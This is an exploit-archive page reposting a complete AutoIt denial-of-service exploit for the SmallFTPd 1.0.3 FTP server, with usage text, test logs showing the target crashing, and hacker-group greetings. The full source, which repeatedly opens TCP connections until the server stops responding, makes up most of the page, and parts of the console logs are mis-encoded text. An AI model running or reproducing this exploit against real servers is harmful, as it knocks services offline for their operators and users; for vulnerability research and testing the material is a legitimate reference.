首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SmallFTPd 1.0.3 Denial Of Service
来源:vfocus.net 作者:Akastep 发布时间:2013-04-07  

#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=aas.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****

#cs
smallftpd 1.0.3.dos.au3

smallftpd 1.0.3 Denial Of Service (Remote Crash) exploit;
This is simple exploit written in AutoIT that crashes Remote/Local  smallftpd 1.0.3  FTP server
If you want to use exploit then you've to compile it as CUI application.
Official site of smallftpd 1.0.3 : =>
http://smallftpd.free.fr/
http://smallftpd.sourceforge.net/
http://sourceforge.net/projects/smallftpd/files/latest/download

=====================================================
Tested *remotely*: From Windows Server 2003 against Win XP SP2 (32 bit)
that runs smallftpd 1.0.3. Result: Remote denial of Service;App crashed.
=====================================================
Tested (local scope) From Win XP SP 2 (32 bit)(192.168.0.1) against Win XP SP 2 32 bit(  192.168.0.15)
that runs smallftpd 1.0.3.
Result: Remote denial of Service;App crashed.
=====================================================
Tested (local scope) from Win XP SP 2(32 bit) (192.168.0.1)  against Windows 7 Ultimate SP 1 (  192.168.0.15)
that runs smallftpd 1.0.3. (<- with XP SP3 compatible mode)
Result: Application didn't crashed but it is unable to accept any connection to port 21.


Here is the later testing result:

c:\dos\smalf\>ping 192.168.0.15

吾戾� 镟赍蜞扈 � 192.168.0.15 镱 32 徉轵:

悟忮� 铗 192.168.0.15: 麒耠� 徉轵=32 怵屐�=2祚 TTL=128
悟忮� 铗 192.168.0.15: 麒耠� 徉轵=32 怵屐�=5祚 TTL=128cls

羊囹桉蜩赅 Ping 潆� 192.168.0.15:
    相赍蝾�: 铗镳噔脲眍 = 2, 镱塍麇眍 = 2, 镱蝈��眍 = 0 (0% 镱蝈瘘),
橡栳腓玷蝈朦眍� 怵屐� 镳桢爨-镥疱溧麒 � 祚:

c:\dos\smalf\>telnet 192.168.0.15 21
220- smallftpd 1.0.3
220- check http://smallftpd.free.fr for more information
220 report bugs to smallftpd@free.fr

530 Not logged in.

c:\dos\smalf\>aas.exe 192.168.0.15 21

##############################################################
##########   smallftpd 1.0.3 DENIAL OF SERVICE exploit #######
##########    Usage: aas.exe REMOTEIP  REMOTEPORT   ##########
\\\\\\\\\\          HACKING IS LIFESTYLE!          //////////
##############################################################

################ WORKING ON IT! PLEASE WAIT...################
--------------------------------------------------------------
~ TRY count: ~ 40
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 80
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 120
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 160
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 200
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 240
--------------------------------------------------------------
##############################################################
##########            Mission Completed! @267            ##########
      TARGET =>ftp://192.168.0.15:21/ is * DOWN ! *
##############################################################
c:\dos\smalf\>telnet 192.168.0.15 21
项潢膻麇龛� � 192.168.0.15...湾 箐嚯铖� 铗牮�� 镱潢膻麇龛� � �铎� 箸塍, 磬 镱痱 21: 厌铋 镱潢膻麇龛�

c:\dos\smalf\>telnet 192.168.0.15 21
项潢膻麇龛� � 192.168.0.15...湾 箐嚯铖� 铗牮�� 镱潢膻麇龛� � �铎� 箸塍, 磬 镱痱 21: 厌铋 镱潢膻麇龛�

c:\dos\smalf\>ping 192.168.0.15

吾戾� 镟赍蜞扈 � 192.168.0.15 镱 32 徉轵:

悟忮� 铗 192.168.0.15: 麒耠� 徉轵=32 怵屐�=1祚 TTL=128
悟忮� 铗 192.168.0.15: 麒耠� 徉轵=32 怵屐�=1祚 TTL=128

羊囹桉蜩赅 Ping 潆� 192.168.0.15:
    相赍蝾�: 铗镳噔脲眍 = 2, 镱塍麇眍 = 2, 镱蝈��眍 = 0 (0% 镱蝈瘘),
橡栳腓玷蝈朦眍� 怵屐� 镳桢爨-镥疱溧麒 � 祚:
    惕龛爨朦眍� = 1祚尻, 锑犟桁嚯�铄 = 1 祚尻, 佯邃礤� = 1 祚尻
Control-C
^C
c:\dos\smalf\>telnet 192.168.0.15 21
项潢膻麇龛� � 192.168.0.15...湾 箐嚯铖� 铗牮�� 镱潢膻麇龛� � �铎� 箸塍, 磬 镱痱 21: 厌铋 镱潢膻麇龛�

c:\dos\smalf\>ipconfig|find /i "192.168"
IP-痿��  . . . . . . . . . . . . : 192.168.0.1
+庚��� 胞� . . . . . . . . . . : 192.168.0.1

 

 


/AkaStep


#ce
#include <String.au3>

 

 

$f=_StringRepeat('#',10);
$USE_PROTO='ftp://';
$INVALIDIP='INVALID IP FORMAT';
$INVALIDPORT='INVALID PORT NUMBER!';
$HTTPUA='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage=$f & '   smallftpd 1.0.3 DENIAL OF SERVICE exploit ' & StringMid($f,1,7) & @CRLF & _
$f & "    Usage: " & _
@ScriptName &  ' REMOTEIP ' &  ' REMOTEPORT   ' & $f & @CRLF & _
StringReplace($f,'#','\') & _StringRepeat(' ',10)  & _
'HACKING IS LIFESTYLE!' & _StringRepeat(' ',10) &  StringReplace($f,'#','/')

if $CmdLine[0]=0 Then
MsgBox(64,"","This is a console Application!" & @CRLF & 'More Info: '  & @ScriptName & ' --help' & @CRLF & _
'Invoke It from MSDOS!',5)
exit;
EndIf
if  $CmdLine[0] <> 2 Then
  ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
  exit;
EndIf

$ip=StringMid($CmdLine[1],1,15);//255.255.255.255
$port=StringMid($CmdLine[2],1,5);//65535

validateall($ip,$port)

func validateall($ip,$port)
if not StringIsDigit($port) Or NOT (Number($port)<=65535) Then
ConsoleWrite($INVALIDPORT);
Exit;
EndIf

TCPStartup();
$ip=TCPNameToIP($ip);
TCPShutdown();

$z=StringSplit($ip,Chr(46));//Asc('.')
if @error then
ConsoleWrite($INVALIDIP);
exit;
EndIf

for $x=0 to $z[0]
if Number($z[0]-1) <>3 Then
 ConsoleWrite($INVALIDIP);
 Exit
EndIf

if $x>=1 AND Not StringIsDigit($z[$x]) Or StringLen($z[$x])>3 Then
 ConsoleWrite($INVALIDIP);
 exit;
 EndIf
Next

$x=0;

ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
ConsoleWrite(@CRLF & $f & _StringRepeat('#',6) & ' WORKING ON IT! PLEASE WAIT...' &  _StringRepeat('#',6) & $f & @CRLF)

downit($ip,$port,$x)

EndFunc; =>validateall($ip,$port)

 

Func downit($ip,$port,$x)
$x+=1;
TCPStartup()
$socket_con = -1
$socket_con = TCPConnect($ip, $port)
If not @error Then


if  Mod($x,40)=0 Then
ConsoleWrite(_StringRepeat('-',62) & @CRLF & '~ TRY count: ~ ' & $x & @CRLF &  _StringRepeat('-',62) & @CRLF)
Sleep(Random(1000,1800,1));
EndIf

downit($ip,$port,$x)


Else

Beep(1000,1500)
ConsoleWrite(_StringRepeat('#',62) & @CRLF & $f & _StringRepeat(' ',12) & 'Mission Completed! @' & $x & _StringRepeat(' ',12) &   $f & @CRLF & _
_StringRepeat(' ',5)  & ' TARGET =>' & StringLower($USE_PROTO & $ip & ':' & $port) & '/ is * DOWN ! * ' & @CRLF &  _StringRepeat('#',62));


TCPShutdown();
exit;
EndIf
EndFunc; ==>downit($ip,$port,$x)


#cs

================================================
           KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
exploit-db.com

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE

*Super special KUDOS to my bro Brendan Coles!
Love you and Respect you dude!
Thank you!*
================================================

#ce


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Groovy Media Player 3.2.0 Buff
·Easy DVD Player (libav) libavc
·Netgear DGN1000B setup.cgi Rem
·Personal File Share 1.0 DoS
·PonyOS 0.4.99-mlp Privilege Es
·MediaMonkey Player v.4.0.7 Loc
·Easy FTP Server 1.7.0.2 Denial
·MongoDB nativeHelper.apply Rem
·HP System Management Homepage
·Linksys E1500/E2500 apply.cgi
·VirtualDJ Pro/Home <=7.3 Buffe
·HP System Management Anonymous
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved